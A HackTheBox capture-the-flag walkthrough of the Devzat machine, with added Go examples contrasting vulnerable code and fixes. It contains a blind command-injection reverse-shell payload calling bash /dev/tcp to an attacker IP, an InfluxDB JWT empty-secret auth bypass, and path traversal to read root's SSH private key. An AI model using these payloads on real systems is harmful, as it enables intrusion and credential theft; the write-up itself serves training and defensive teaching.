Devzat — Hackthebox walkthrough

Kavishka Gihan
6 min read · Mar 12, 2022

This machine was a really cool one and I learned a lot from it. It had a pretty unique attack path, which I really enjoyed. I recommend it to anyone who likes sneaky ways of exploiting a box.

Foothold

Just like always, I started with an nmap scan.

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)

There were 3 open ports: 22, 80 and 8000. Port 80 served a static webpage about a chat client that runs over SSH. Since there was nothing that interesting on the webpage, I started doing some enumeration.

First, I started enumerating subdomains. I tried gobuster first, but it didn't seem to work, so I switched to ffuf.

ffuf -u 'http://devzat.htb/' -H 'Host: FUZZ.devzat.htb' -w /usr/share/wordlists/dirb/api_endpoints.txt -fw 18

I found a subdomain called pets.devzat.htb. I added an entry for it to the /etc/hosts file and visited the site. It was a pet inventory. At the bottom of the page, there was an input form to add pets.

So I added a new pet and intercepted the request with Burp to see what was happening under the hood. It was a POST request to the /api/pet endpoint.

I tried a bunch of ways to exploit this and ended up trying command injection. Since the response didn't return any data, I knew I had to look at blind injection.

I was able to confirm blind command injection by simply adding ;curl 10.10.14.203 to the end of the 'species' parameter. Then I got a shell with this payload.

{"name":"test","species":"cat; bash -c 'bash -i >& /dev/tcp/10.10.14.203/9090 0>&1'"}

This was possible because user input was passed directly into a shell command without proper sanitization.
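To show what that bug looks like in code and how to close it, here is an added Go example. It is a constructed illustration, not the pets application's real source: the command string, the `characteristics/` directory, the `buildShellCommand` and `safeArgs` function names and the letters-only allowlist are all my assumptions. The point is the difference between gluing the field into a string that a shell parses and passing a validated argv straight to the process.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
)

// Vulnerable pattern (constructed): the "species" field is spliced into a
// command line that will later be handed to "sh -c". A ';' in the field
// terminates the intended command and starts a second one.
func buildShellCommand(species string) string {
	return "cat characteristics/" + species
}

// speciesPattern is an assumed allowlist: a species name is letters only.
var speciesPattern = regexp.MustCompile(`^[A-Za-z]+$`)

// safeArgs validates the field and returns an argv for exec.Command, so no
// shell ever parses the user's string. Validation is the first line of
// defence; dropping the shell is the second, and both are cheap.
func safeArgs(species string) ([]string, error) {
	if !speciesPattern.MatchString(species) {
		return nil, errors.New("species must be letters only")
	}
	// "--" stops cat from treating the name as an option if the allowlist ever widens.
	return []string{"cat", "--", "characteristics/" + species}, nil
}

func main() {
	// Constructed input in the spirit of the post's blind-injection probe.
	payload := "cat; id"
	fmt.Println("shell string:", buildShellCommand(payload)) // ';' ends the cat command and starts a second one

	if _, err := safeArgs(payload); err != nil {
		fmt.Println("hardened handler rejected it:", err)
	}

	args, _ := safeArgs("cat")
	cmd := exec.Command(args[0], args[1:]...) // built but not started; argv goes straight to execve
	fmt.Println("would execute argv:", cmd.Args)
}
```

With the argv form the operating system receives `cat`, `--` and the path as three separate strings, so even a field containing `;` or `$(...)` would only ever be a (non-existent) file name. The allowlist on top makes the failure visible in logs instead of silently passing odd input through.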

User

I took the SSH private key from the patrick user's home directory and SSHed in as patrick. There was a devzat directory in patrick's home directory. Since there were a lot of files, I grepped through them for words like key and passw to see what I would get.

grep -R 'key\|passw'

And I found this devchat.go file with some interesting information.

Reading it, there were 3 interesting things to notice:

  • InfluxDB was running.
  • A new feature had been implemented in the devzat application.
  • The source for that feature had been left in backups.

I went after these separately. I saw that port 8086, the default port for InfluxDB, was open, so to work with it I forwarded that port to my local box with SSH.

ssh -L 8086:127.0.0.1:8086 -N -vv patrick@devzat.htb -i patrick.id_rsa

Then I connected to it with influx. But when I tried to run queries, it errored out asking for authentication. I also saw that it was running version 1.7.5.

Doing a quick Google search, I found an authentication bypass exploit for this version.

So I cloned it and started exploiting. After connecting, I specified the username as admin. This exploits the authentication function: a JWT token in a request may be validated against an empty SharedSecret, which makes it possible to execute queries as any user without the password.
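The weakness is easier to see with a small token verifier next to its fixed form, so here is an added Go example. It is a constructed illustration, not InfluxDB's code: the `claims` struct, the `signHS256`, `verifyLoose` and `verifyStrict` names and the secret values are assumptions. `verifyLoose` accepts whatever secret it is handed, including an empty one, so in a deployment that never configured a shared secret anyone can mint a token that passes; `verifyStrict` refuses to use token authentication at all until a secret exists.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"time"
)

// claims is the minimal payload the verifier cares about (constructed).
type claims struct {
	Username string `json:"username"`
	Exp      int64  `json:"exp"`
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// signHS256 is the legitimate issuer side: header.payload.HMAC-SHA256(secret).
func signHS256(c claims, secret []byte) string {
	header := b64([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, _ := json.Marshal(c)
	signingInput := header + "." + b64(body)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64(mac.Sum(nil))
}

// verifyLoose mirrors the weakness the post describes: the MAC is checked
// against whatever secret is configured, even the empty string, so a
// deployment with no secret accepts tokens anyone can produce.
func verifyLoose(token string, secret []byte, now int64) (string, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return "", errors.New("malformed token")
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil || !hmac.Equal(sig, mac.Sum(nil)) {
		return "", errors.New("bad signature")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return "", err
	}
	var c claims
	if err := json.Unmarshal(payload, &c); err != nil {
		return "", err
	}
	if c.Exp == 0 || c.Exp < now {
		return "", errors.New("token expired or has no exp")
	}
	return c.Username, nil
}

// verifyStrict: an unset secret means token auth is not configured, so it is
// disabled rather than silently degraded to "sign with nothing".
func verifyStrict(token string, secret []byte, now int64) (string, error) {
	if len(secret) == 0 {
		return "", errors.New("shared secret not configured; token auth disabled")
	}
	return verifyLoose(token, secret, now)
}

func main() {
	now := time.Now().Unix()
	emptySecret := []byte("") // constructed: a deployment that never set a secret
	tok := signHS256(claims{Username: "admin", Exp: now + 3600}, emptySecret)

	u, err := verifyLoose(tok, emptySecret, now)
	fmt.Println("loose verifier:", u, err) // accepted as admin
	_, err = verifyStrict(tok, emptySecret, now)
	fmt.Println("strict verifier:", err) // refused until a secret is configured
}
```

A production verifier would additionally pin the `alg` in the header and reject tokens with no expiry; the example keeps only the check that matters for this bug. On the operations side the same lesson applies: treat an empty shared secret in the config as a misconfiguration to alert on, not as a valid key.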

So I was able to successfully bypass the login.

I found that there was a user table in the devzat database.

show measurements on devzat

After some struggle, I was finally able to list the records of the user table with this query.

SELECT * FROM "devzat"."myretention"."user"

I used this password to log in as catherine.

Root

The second thing I found in the devchat.go file was the newly implemented feature. It also mentioned a backup of the source. Looking in /var/backups/, I saw 2 interesting backup files.

So I downloaded them to my local box and extracted them. This created 2 directories, main and dev. I again used grep to find anything interesting inside these directories.

grep -R 'key\|pass\|admin'

And I found this password in the commands.go file. Reading this file, I understood that the newly added feature was a way to read files with the file command.

I knew I had to exploit this feature with the password I found. So, as the file said, I connected to the local application, which was hosted on port 8443.

ssh -l kavi -p 8443 127.0.0.1

Then, following the script, I used the file command with the password.

/file test CeilingCatStillAThingIn2021?

But I got an error saying:

Since the script used the .Join() method to construct the path of the file, I was able to read the private key of the root user with this command.

/file ../.ssh/id_rsa CeilingCatStillAThingIn2021?
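Why Join() alone is not a boundary, and what the check should have been, as an added Go example. This is a constructed illustration, not the commands.go source from the backup: the `filesDir` base directory, the `unsafeResolve` and `safeResolve` names are assumptions, and the real application's directory is not shown in the post. `filepath.Join` cleans the result, so `..` segments in the user-supplied name walk upward out of the base directory; the fix is to compute the relative path back to the base after joining and reject anything that starts with `..`.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// filesDir is an assumed base directory for the file command.
const filesDir = "/root/devzat"

// unsafeResolve is the pattern the post describes: Join() normalises the
// path, so "../" in the user-supplied name climbs out of filesDir.
func unsafeResolve(name string) string {
	return filepath.Join(filesDir, name)
}

// safeResolve joins the same way, then checks that the result is still inside
// filesDir before anything is opened. Symlinks are not resolved here; a real
// handler would also run filepath.EvalSymlinks on the result and re-check.
func safeResolve(name string) (string, error) {
	full := filepath.Join(filesDir, name)
	rel, err := filepath.Rel(filesDir, full)
	if err != nil {
		return "", err
	}
	// ".." exactly, or "../x": the cleaned path left the base directory.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("path escapes the files directory")
	}
	return full, nil
}

func main() {
	// Constructed inputs: the post's two file names plus an absolute path.
	for _, name := range []string{"test", "../.ssh/id_rsa", "/etc/passwd"} {
		fmt.Printf("%-16s join -> %s", name, unsafeResolve(name))
		if full, err := safeResolve(name); err != nil {
			fmt.Printf("  rejected: %v\n", err)
		} else {
			fmt.Printf("  allowed: %s\n", full)
		}
	}
}
```

Note that the absolute input is not a traversal under this scheme: `filepath.Join` treats it as relative to the base, so it stays inside and is allowed. A file name such as `..foo` is also allowed, which is why the check compares against `..` and `../` rather than testing for a `..` prefix on its own.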

Then I used this key to SSH in as root.

ssh root@devzat.htb -i root.id-rsa

Rooted!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄


Kavishka Gihan

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan